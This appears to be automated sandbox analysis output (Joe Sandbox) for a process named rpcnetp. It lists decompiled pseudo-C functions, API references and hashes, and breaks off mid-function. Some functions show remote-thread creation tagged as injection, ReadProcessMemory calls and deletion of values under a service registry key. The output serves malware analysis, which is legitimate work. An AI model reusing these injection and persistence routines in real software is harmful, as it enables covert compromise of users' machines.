ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1234A
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12363
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12394
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A1239C
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 00A123BF
ExitThread.KERNEL32 ref: 00A12422

Strings

x, xrefs: 00A1236D

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: MemoryProcessRead$Event$ExitHandleResetThread
String ID: x
API String ID: 2307309678-2363233923
Opcode ID: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
Instruction ID: b6af17b0f7911cb0660304d8bb744c489efc4f1456ba042e07f40eac7a05b786
Opcode Fuzzy Hash: 075bcaf98e5dd791630868526e830d259f0e5d8cc60576f0329b115a48e2c5d0
Instruction Fuzzy Hash: 9131257190021AEFDF21DBE4CD84FEDBBB9BB08314F144169E621B6090D778AA95CB61

Uniqueness

Uniqueness Score: -1.00%

Function 72B216BA, Relevance: 12.1, APIs: 8, Instructions: 53
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

0x72b216be
0x72b216c1
0x72b216c9
0x72b216d2
0x72b216d8
0x72b216e0
0x72b216e3
0x72b216e9
0x72b216f7
0x72b216fa
0x72b216fa
0x72b216fc
0x72b21704
0x72b21707
0x72b21707
0x72b21709
0x72b21717
0x72b2171f
0x72b2172b
0x72b2172d
0x72b2172d
0x72b21734
0x72b2173c
0x72b2173f
0x72b2173f
0x72b21741
0x72b21749
0x72b2174c
0x72b2174c
0x72b21751
0x00000000
0x72b21758
0x72b2175b

APIs

EnterCriticalSection.KERNEL32(?), ref: 72B216E3
SetEvent.KERNEL32(?), ref: 72B216FA
SetEvent.KERNEL32(?), ref: 72B21707
WaitForSingleObject.KERNEL32(?,000007D0), ref: 72B2171F
CloseHandle.KERNEL32(?), ref: 72B2172B
CloseHandle.KERNEL32(?), ref: 72B2173F
CloseHandle.KERNEL32(?), ref: 72B2174C
DeleteCriticalSection.KERNEL32(?), ref: 72B21751

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
String ID:
API String ID: 2299618653-0
Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64

Uniqueness

Uniqueness Score: -1.00%

Function 00A116BA, Relevance: 12.1, APIs: 8, Instructions: 53
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A116BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

0x00a116be
0x00a116c1
0x00a116c9
0x00a116d2
0x00a116d8
0x00a116e0
0x00a116e3
0x00a116e9
0x00a116f7
0x00a116fa
0x00a116fa
0x00a116fc
0x00a11704
0x00a11707
0x00a11707
0x00a11709
0x00a11717
0x00a1171f
0x00a1172b
0x00a1172d
0x00a1172d
0x00a11734
0x00a1173c
0x00a1173f
0x00a1173f
0x00a11741
0x00a11749
0x00a1174c
0x00a1174c
0x00a11751
0x00000000
0x00a11758
0x00a1175b

APIs

EnterCriticalSection.KERNEL32(?), ref: 00A116E3
SetEvent.KERNEL32(?), ref: 00A116FA
SetEvent.KERNEL32(?), ref: 00A11707
WaitForSingleObject.KERNEL32(?,000007D0), ref: 00A1171F
CloseHandle.KERNEL32(?), ref: 00A1172B
CloseHandle.KERNEL32(?), ref: 00A1173F
CloseHandle.KERNEL32(?), ref: 00A1174C
DeleteCriticalSection.KERNEL32(?), ref: 00A11751

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
String ID:
API String ID: 2299618653-0
Opcode ID: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
Instruction ID: cab75807c150e2e75d4836ca90c5957c47be791944fdb4ad262fa6cf47365af7
Opcode Fuzzy Hash: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
Instruction Fuzzy Hash: 0F115279700744ABCB20EB75DC94AC7BBECAF08791B058819FA59D7250E734E881CEA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B23161, Relevance: 10.6, APIs: 7, Instructions: 62
windowregistrytimeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4;
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x72b26060);
				 *0x72b2600c = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~( *0x72b26038) & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}

0x72b23161
0x72b23166
0x72b2316b
0x72b23172
0x72b2317d
0x72b23182
0x72b23192
0x72b23198
0x72b231a5
0x72b231ab
0x72b231b7
0x72b231c4
0x72b231d9
0x72b231df
0x72b231f4
0x72b231fe
0x72b231fe
0x72b23206
0x72b23215
0x72b23220

APIs

GetModuleFileNameA.KERNEL32(?,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 72B231A5
RegisterClassA.USER32 ref: 72B231AB
CreateWindowExA.USER32 ref: 72B231B1
SetTimer.USER32(00000064,?,00000000), ref: 72B231D9
GetMessageA.USER32 ref: 72B231E6
TranslateMessage.USER32(?), ref: 72B231F4
DispatchMessageA.USER32 ref: 72B231FE

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
String ID:
API String ID: 2359640614-0
Opcode ID: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
Opcode Fuzzy Hash: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B22296, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}

0x72b222aa
0x72b222b1
0x72b222b9
0x72b222cf
0x72b222dd
0x72b222ed
0x72b222fd
0x72b22304
0x00000000
0x00000000
0x72b222e7
0x72b222e7
0x00000000
0x72b22311
0x72b22313

APIs

RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
RegEnumValueA.ADVAPI32 ref: 72B22300
RegCloseKey.ADVAPI32(?), ref: 72B22309

Strings

System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Value$CloseDeleteEnumOpenQuery
String ID: System\CurrentControlSet\Services\rpcnetp
API String ID: 1768883651-3077676073
Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 72B21F95, Relevance: 9.1, APIs: 6, Instructions: 113
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28);
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				if(E72B21775(_t83, _t83 + 0x1bc8, 0, 2) == 0 || E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1) == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c));
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}

0x72b21f95
0x72b21f95
0x72b21f9a
0x72b21f9f
0x72b21fa6
0x72b21fa9
0x72b21fac
0x72b21fb9
0x72b21fca
0x72b21fd2
0x72b21fe8
0x72b21fff
0x72b22004
0x72b2200b
0x72b22012
0x72b22019
0x72b2201c
0x72b2201f
0x72b22025
0x72b2202f
0x72b2203a
0x72b22041
0x72b2205f
0x72b22065
0x72b2206a
0x72b2206c
0x72b2206c
0x72b2206a
0x72b22073
0x72b2207e
0x72b22080
0x72b22080
0x72b22083
0x72b22095
0x72b220fb
0x72b22109
0x72b220aa
0x72b220aa
0x72b220b0
0x72b220b4
0x72b220b4
0x72b220bc
0x72b220e1
0x72b220e4
0x72b220ea
0x72b220ea
0x00000000
0x72b220be
0x72b220c1
0x72b220d0
0x72b220d9
0x72b220f7
0x72b220f7
0x72b220f7
0x72b220f7
0x00000000
0x72b220f7
0x72b220bc

APIs

GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7

Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
ResumeThread.KERNEL32(?), ref: 72B220C1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
CloseHandle.KERNEL32(?), ref: 72B220D9

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
String ID:
API String ID: 3869061129-0
Opcode ID: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
Opcode Fuzzy Hash: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A11F95, Relevance: 9.1, APIs: 6, Instructions: 113
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A11F95(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t82;
				void* _t83;
				signed int _t94;

				_push(0x6c0);
				_push(0xa153a8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t83 - 0x20) = 0;
				 *(_t83 - 0x1c) = 0;
				 *((intOrPtr*)(_t83 - 0x24)) = 0;
				 *(_t83 - 0x20) = GetStdHandle(0xfffffff4);
				E00A14D2D(_t83 - 0x3a0, 0, 0x32e);
				 *((short*)(_t83 - 0x398)) = 0x32a;
				E00A14D14(_t83 - 0x6d0, _t83 - 0x3a0, 0x32e);
				E00A14D44(_t83 - 0x70, _t83 - 0x6c8, _t83 - 0x398);
				 *((intOrPtr*)(_t83 - 0x3c)) = E00A15277;
				 *((intOrPtr*)(_t83 - 0x38)) = E00A15313;
				 *((intOrPtr*)(_t83 - 0x34)) = E00A1224A;
				_t82 =  *(_t83 + 8);
				 *(_t83 - 0x30) = _t82;
				 *_t82 = 0x237;
				 *((intOrPtr*)(_t82 + 4)) = 6;
				if( *(_t83 - 0x20) != 0 &&  *(_t83 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t83 - 0x24)) = 1;
					 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t83 - 0x20), 0, 0, E00A13223(E00A11C7B), _t82, 4, _t83 - 0x28);
					 *(_t83 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t83 + 8) = E00A11829;
				if( *((intOrPtr*)(_t82 + 0x6c)) == 4) {
					 *(_t83 + 8) = 0;
				}
				_t75 = _t82 + 0x1bc8;
				if(E00A11775(_t82, _t82 + 0x1bc8, 0, 2) == 0 || E00A11775(_t82, _t82 + 0x78,  *(_t83 + 8), 1) == 0) {
					L15:
					return E00A1159C(E00A14DC6(_t94, _t83 - 0x70));
				} else {
					 *(_t83 - 4) = 0;
					if( *((intOrPtr*)(_t83 - 0x24)) == 0) {
						E00A12429(_t75, 0);
					}
					if( *(_t83 - 0x1c) == 0) {
						do {
							_push(_t83 - 0x70);
							__eflags = E00A11D27(_t75, 0, _t82, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t83 - 0x1c));
						WaitForMultipleObjects(2, _t83 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t83 - 0x1c));
						L14:
						_t42 = _t83 - 4;
						 *_t42 =  *(_t83 - 4) | 0xffffffff;
						_t94 =  *_t42;
						goto L15;
					}
				}
			}

0x00a11f95
0x00a11f9a
0x00a11f9f
0x00a11fa6
0x00a11fa9
0x00a11fac
0x00a11fb9
0x00a11fca
0x00a11fd2
0x00a11fe8
0x00a11fff
0x00a12004
0x00a1200b
0x00a12012
0x00a12019
0x00a1201c
0x00a1201f
0x00a12025
0x00a1202f
0x00a1203a
0x00a12041
0x00a1205f
0x00a12065
0x00a1206a
0x00a1206c
0x00a1206c
0x00a1206a
0x00a12073
0x00a1207e
0x00a12080
0x00a12080
0x00a12083
0x00a12095
0x00a120fb
0x00a12109
0x00a120aa
0x00a120aa
0x00a120b0
0x00a120b4
0x00a120b4
0x00a120bc
0x00a120e1
0x00a120e4
0x00a120ea
0x00a120ea
0x00000000
0x00a120be
0x00a120c1
0x00a120d0
0x00a120d9
0x00a120f7
0x00a120f7
0x00a120f7
0x00a120f7
0x00000000
0x00a120f7
0x00a120bc

APIs

GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7

Part of subcall function 00A14D44: GetVersion.KERNEL32(?,00A16150,00000034,0000032E,?,00A12004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A14D61

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
ResumeThread.KERNEL32(?), ref: 00A120C1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
CloseHandle.KERNEL32(?), ref: 00A120D9

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
String ID:
API String ID: 3869061129-0
Opcode ID: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
Instruction ID: 277028db6a4a490f77cbeaa80d0e5255b9867b1d02e9fb5080022b90e3ebbaa6
Opcode Fuzzy Hash: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
Instruction Fuzzy Hash: 5A4159B1C00618AADF21DFA4DD45EEEBBBCBF49350F10421AF695A6190D7749AC1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 72B22FF9, Relevance: 9.1, APIs: 6, Instructions: 97
threadwindowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0x72b260ce != 0) {
						_t53 = 0x72b260ce;
					}
					if(E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

0x72b23015
0x72b2301a
0x72b23021
0x72b23021
0x72b23021
0x72b23027
0x72b23028
0x72b2302b
0x00000000
0x00000000
0x72b2302e
0x72b2310a
0x72b23111
0x72b2312f
0x72b2312f
0x72b23034
0x72b23039
0x72b23039
0x72b23042
0x72b23044
0x72b23044
0x72b2305f
0x72b2307a
0x00000000
0x00000000
0x72b2307c
0x00000000
0x72b2305f
0x72b2308e
0x72b23092
0x72b23094
0x72b23098
0x72b230a2
0x72b230b0
0x72b230b7
0x72b230c9
0x72b230d0
0x72b230d6
0x72b230de
0x72b230e2
0x72b230eb
0x72b230f2
0x72b230f2
0x72b230de
0x72b230fc
0x72b23104
0x00000000
0x00000000
0x00000000
0x00000000

APIs

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
GetCurrentThreadId.KERNEL32 ref: 72B2309C
CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 72B230D0
SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
PostMessageA.USER32 ref: 72B23125

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
String ID:
API String ID: 2250156434-0
Opcode ID: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
Opcode Fuzzy Hash: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A12FF9, Relevance: 9.1, APIs: 6, Instructions: 97
threadwindowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A12FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E00A14D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
